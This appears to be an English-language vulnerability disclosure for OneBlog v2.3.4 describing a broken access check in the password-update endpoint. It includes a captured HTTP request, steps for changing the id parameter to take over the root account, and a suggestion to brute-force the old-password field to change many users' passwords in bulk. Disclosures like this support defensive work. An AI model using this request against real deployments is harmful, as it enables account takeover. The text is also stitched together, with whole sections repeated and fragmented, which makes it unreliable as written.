### vulnerability recurrence

First log in to the background using the low-privileged user admin/123456


Click the modify password function, enter the old password and the new password, and then use burpsuite to crawl the packet

```http

POST /passport/updatePwd HTTP/1.1

Host: localhost:8085

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 66

Origin: http://localhost:8085

Connection: close

Referer: http://localhost:8085/

Cookie: session_user="93lkCfVDA258ElC3HuO7gUY4xGkEK1BFLktUlzaQ+c8="; Hm_lvt_1040d081eea13b44d84a4af639640d51=1654896251; pageno_cookie=1; SHIRO_SESSION_ID=47e409dd-e488-4e2f-8a68-42ae7cd2de9c;

id=2&password=123456&newPassword=1234567&newPasswordRepeat=1234567

```


Modify the id parameter to the id of another user, Because there is no verification here that the user id is consistent with the current user.

If the password of other users with the same permission is the same as the password field, you can horizontally exceed the authority to change the password of other users. If the password of the high-permission user is the same as the password field, you can change the password of the high-permission account vertically.

Modify id to 1. The user whose ID is 1 is the highest privileged root user, prompts you that the modification is successful, and then requires you to log in again.


Log in to the root account again and find that the original password is no longer available.


Log in successfully with the new password


You can also break the password field and modify the passwords of other users in batches.


### Vulnerability analysis

`com.zyd.blog.controller.PassportController`

Reset the password in the updatePwd method of the / updatePwd path


Follow the `com.zyd.blog.business.service.impl#updatePwd` ：

First, obtain the User object according to the user id passed by the front-end user. If the User is not null, determine whether the password field passed by the user is consistent with the user password corresponding to the id, and if so, reset the password.

So in fact, neither verifying whether the user id is the currently logged in user, nor verifying that the original password is the password of the current user, which eventually leads to ultra vires vulnerability.


### vulnerability recurrence

First log in to the background using the low-privileged user admin/123456


Click the modify password function, enter the old password and the new password, and then use burpsuite to crawl the packet

```http

POST /passport/updatePwd HTTP/1.1

Host: localhost:8085

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:80.0) Gecko/20100101 Firefox/80.0

Accept: */*

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 66

Origin: http://localhost:8085

Connection: close

Referer: http://localhost:8085/

Cookie: session_user="93lkCfVDA258ElC3HuO7gUY4xGkEK1BFLktUlzaQ+c8="; Hm_lvt_1040d081eea13b44d84a4af639640d51=1654896251; pageno_cookie=1; SHIRO_SESSION_ID=47e409dd-e488-4e2f-8a68-42ae7cd2de9c;

id=2&password=123456&newPassword=1234567&newPasswordRepeat=1234567

```


Modify the id parameter to the id of another user, Because there is no verification here that the user id is consistent with the current user.

If the password of other users with the same permission is the same as the password field, you can horizontally exceed the authority to change the password of other users. If the password of the high-permission user is the same as the password field, you can change the password of the high-permission account vertically.

Modify id to 1. The user whose ID is 1 is the highest privileged root user, prompts you that the modification is successful, and then requires you to log in again.


Log in to the root account again and find that the original password is no longer available.


Log in successfully with the new password


You can also break the password field and modify the passwords of other users in batches.


### Vulnerability analysis

`com.zyd.blog.controller.PassportController`

Reset the password in the updatePwd method of the / updatePwd path


Follow the `com.zyd.blog.business.service.impl#updatePwd` ：

First, obtain the User object according to the user id passed by the front-end user. If the User is not null, determine whether the password field passed by the user is consistent with the user password corresponding to the id, and if so, reset the password.

So in fact, neither verifying whether the user id is the currently logged in user, nor verifying that the original password is the password of the current user, which eventually leads to ultra vires vulnerability.


First log in to the background using the low-privileged user admin/123456

If the password of other users with the same permission is the same as the password field, you can horizontally exceed the authority to change the password of other users. If the password of the high-permission user is the same as the password field, you can change the password of the high-permission account vertically.

Modify id to 1. The user whose ID is 1 is the highest privileged root user, prompts you that the modification is successful, and then requires you to log in again.

You can also break the password field and modify the passwords of other users in batches.


### Vulnerability analysis

`com.zyd.blog.controller.PassportController`

Reset the password in the updatePwd method of the / updatePwd path


Follow the `com.zyd.blog.business.service.impl#updatePwd` ：

First, obtain the User object according to the user id passed by the front-end user. If the User is not null, determine whether the password field passed by the user is consistent with the user password corresponding to the id, and if so, reset the password.

So in fact, neither verifying whether the user id is the currently logged in user, nor verifying that the original password is the password of the current user, which eventually leads to ultra vires vulnerability.


OneBlog v2.3.4 password reset exists ultra vires vulnerability